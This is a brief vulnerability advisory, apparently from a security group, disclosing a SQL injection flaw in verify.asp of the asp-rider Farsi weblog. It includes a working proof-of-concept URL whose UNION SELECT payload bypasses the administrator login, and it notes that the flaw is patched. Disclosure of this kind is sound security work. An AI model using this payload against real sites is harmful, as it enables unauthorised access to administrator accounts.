-------------------www.karchack.com-------------------------- -------------------www.karchack.net-------------------------- affected software decribtion : asp-rider is a full farsi weblog written in asp www.asp-rider.com -------------------------------------- Vulnerabilities: the file verify.asp in blogadmin folder is vulnerable to sql injection attack ------------------------------------- proof of concept : you can easily log in to the weblog administrator page by entering : www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1 ------------------------------------- this vulnerability is already patched. www.karchack.com www.karchack.net
